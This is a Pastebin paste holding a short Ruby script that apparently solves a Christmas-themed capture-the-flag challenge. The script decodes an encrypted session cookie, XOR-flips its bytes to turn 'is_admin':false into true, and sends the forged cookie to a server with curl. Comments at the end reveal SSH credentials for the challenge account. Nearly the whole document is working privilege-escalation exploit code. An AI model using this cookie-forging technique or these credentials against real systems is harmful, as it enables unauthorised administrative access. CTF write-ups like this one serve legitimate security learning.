Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- require "uri"
- require "base64"
- class String
- def decode
- Base64.decode64(URI.unescape(self))
- end
- def encode
- URI.escape(Base64.encode64(self).chomp).gsub("+", "%2B").gsub("=", "%3D")
- end
- end
- raw_cookie = "ccYKPh4W%2BAEcJGLVIbhReh3q3cRXEARRll0DKGEkdNf%2BsWA%3D"
- cookie = raw_cookie.decode
- # {"user":"elf2207","is_admin":false"}
- q = cookie.unpack("C*")
- q[29] ^= ("t".ord ^ "f".ord)
- q[30] ^= ("r".ord ^ "a".ord)
- q[31] ^= ("u".ord ^ "l".ord)
- q[32] ^= ("e".ord ^ "s".ord)
- q[33] ^= (" ".ord ^ "e".ord)
- hacked_cookie = q.pack("C*")
- system %Q[curl --header "Cookie: encrypted_session=#{hacked_cookie.encode}" "http://178.62.63.250/"]
- # After poking around for a while you realise that the system is fundamentally broken,
- # and even admins cannot edit the naughty and nice lists!
- #
- # Determined to exploit the system you press on, and discover that the elf has
- # SSH access to the system, with the credentials "elf2207" and the password "snowball2" (!).
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement